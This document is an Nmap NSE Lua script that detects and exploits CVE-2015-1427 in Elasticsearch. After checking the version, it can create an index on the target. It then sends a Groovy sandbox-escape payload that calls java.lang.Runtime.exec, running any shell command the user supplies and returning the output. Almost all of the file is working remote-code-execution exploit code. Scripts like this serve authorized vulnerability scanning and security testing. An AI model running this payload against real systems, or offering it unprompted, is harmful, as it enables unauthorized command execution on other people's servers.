local http = require "http" local shortport = require "shortport" local stdnse = require "stdnse" local string = require "string" local vulns = require "vulns" local json = require "json" local nmap = require "nmap" description = [[ This script attempts to detect a vulnerability, CVE-2015-1427, which allows attackers to leverage features of this API to gain unauthenticated remote code execution (RCE). Elasticsearch versions 1.3.0-1.3.7 and 1.4.0-1.4.2 have a vulnerability in the Groovy scripting engine. The vulnerability allows an attacker to construct Groovy scripts that escape the sandbox and execute shell commands as the user running the Elasticsearch Java VM. ]] --- -- @args command Enter the shell comannd to be executed. The script outputs the Java -- and Elasticsearch versions by default. -- @args invasive If set to true then it creates an index if there are no indices. -- -- @usage -- nmap --script=http-vuln-cve2015-1427 --script-args command= 'ls' -- --@output -- | http-vuln-cve2015-1427: -- | VULNERABLE: -- | ElasticSearch CVE-2015-1427 RCE Exploit -- | State: VULNERABLE (Exploitable) -- | IDs: CVE:CVE-2015-1427 -- | Risk factor: High CVSS2: 7.5 -- | The vulnerability allows an attacker to construct Groovy -- | scripts that escape the sandbox and execute shell commands as the user -- | running the Elasticsearch Java VM. -- | Exploit results: -- | ElasticSearch version: 1.3.7 -- | Java version: 1.8.0_45 -- | References: -- | http://carnal0wnage.attackresearch.com/2015/03/elasticsearch-cve-2015-1427-rce-exploit.html -- | https://jordan-wright.github.io/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/ -- | https://github.com/elastic/elasticsearch/issues/9655 -- |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1427 author = {"Gyanendra Mishra", "Daniel Miller"} license = "Same as Nmap--See https://nmap.org/book/man-legal.html" categories = {"vuln", "intrusive"} portrule = shortport.port_or_service(9200, "http", "tcp") local function parseResult(parsed) -- for commands that return printable results if parsed.hits.hits[1] and parsed.hits.hits[1].fields and parsed.hits.hits[1].fields.exploit[1] then return parsed.hits.hits[1].fields.exploit[1] end -- mkdir(etc) command seems to work but as it returns no result if parsed.hits.total > 0 then return "Likely vulnerable. Command entered gave no output to print. Use without command argument to ensure vulnerability." end return false end action = function(host, port) local command = stdnse.get_script_args(SCRIPT_NAME .. ".command") local invasive = stdnse.get_script_args(SCRIPT_NAME .. ".invasive") local payload = { size= 1, query= { match_all= {} }, script_fields= { exploit= { lang= "groovy", -- This proves vulnerability because the fix was to prevent access to -- .class and .forName script= '"ElasticSearch version: "+\z java.lang.Math.class.forName("org.elasticsearch.Version").CURRENT+\z "\\n Java version: "+\z java.lang.Math.class.forName("java.lang.System").getProperty("java.version")' } } } if command then payload.script_fields.exploit.script = string.format( 'java.lang.Math.class.forName("java.util.Scanner").getConstructor(\z java.lang.Math.class.forName("java.io.InputStream")).newInstance(\z java.lang.Math.class.forName("java.lang.Runtime").getRuntime().exec(\z %s).getInputStream()).useDelimiter("highlyunusualstring").next()', json.generate(command)) end local json_payload = json.generate(payload) local vuln_table = { title = "ElasticSearch CVE-2015-1427 RCE Exploit", state = vulns.STATE.NOT_VULN, risk_factor = "High", references = { 'http://carnal0wnage.attackresearch.com/2015/03/elasticsearch-cve-2015-1427-rce-exploit.html', 'https://jordan-wright.github.io/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/', 'https://github.com/elastic/elasticsearch/issues/9655' }, IDS = { CVE = 'CVE-2015-1427' }, scores = { CVSS2 = '7.5' }, description = [[The vulnerability allows an attacker to construct Groovy scripts that escape the sandbox and execute shell commands as the user running the Elasticsearch Java VM.]] } local report = vulns.Report:new(SCRIPT_NAME, host, port) local cleanup = function() return end local nocache = {no_cache=true, bypass_cache=true} --lets check the elastic search version. local response = http.get(host, port, '/') if response.status == 200 and response.body then local status, parsed = json.parse(response.body) if not(status) then stdnse.debug1('Parsing JSON failed(version checking). Probably not running Elasticsearch') return nil else if parsed.version.number then --check if a vulnerable version is running if (tostring(parsed.version.number):find('1.3.[0-7]') or tostring(parsed.version.number):find('1.4.[0-2]')) then vuln_table.state = vulns.STATE.LIKELY_VULN end --help the version/service detection. port.version = { name = 'elasticsearch', name_confidence = 10, product = 'Elastic elasticsearch', version = tostring(parsed.version.number), service_tunnel = 'none', cpe = {'cpe:/a:elasticsearch:elasticsearch:' .. tostring(parsed.version.number)} } nmap.set_port_version(host,port,'hardmatched') else stdnse.debug1('Cant Be Elastic search as no version number present.') return nil end end else stdnse.debug1('Not Running Elastic Search.') return nil end -- check if it is indexed, if not create index response = http.get(host,port,'_cat/indices', nocache) if response.status ~= 200 then stdnse.debug1( "Couldnt fetch indices.") return report:make_output(vuln_table) elseif response.body == '' then if invasive then local rand = string.lower(stdnse.generate_random_string(8)) cleanup = function() local r = http.generic_request(host, port, "DELETE", ("/%s"):format(rand)) if r.status ~= 200 or not r.body:match('"acknowledged":true') then stdnse.debug1( "Could not delete index created by invasive script-arg") end end local data = { [rand] = rand } stdnse.debug1("Creating Index. 5 seconds wait.") response = http.put(host,port,('%s/%s/1'):format(rand, rand),nil,json.generate(data)) if not(response.status == 201) then stdnse.debug1( "Didnt have any index. Creating index failed.") return report:make_output(vuln_table) end stdnse.sleep(5) -- search will not return results immediately else stdnse.debug1("Not Indexed. Try the invasive option ;)") return report:make_output(vuln_table) end end --execute the command local target = '_search' response = http.post(host, port, target ,nil ,nil ,(json_payload)) if not(response.body) or not(response.status==200) then cleanup() return report:make_output(vuln_table) else local status,parsed = json.parse(response.body) if ( not(status) ) then stdnse.debug1("JSON not parsable.") cleanup() return report:make_output(vuln_table) end --if the parseResult function returns something then lets go ahead local results = parseResult(parsed) if results then vuln_table.state = vulns.STATE.EXPLOIT vuln_table.exploit_results = results end end cleanup() return report:make_output(vuln_table) end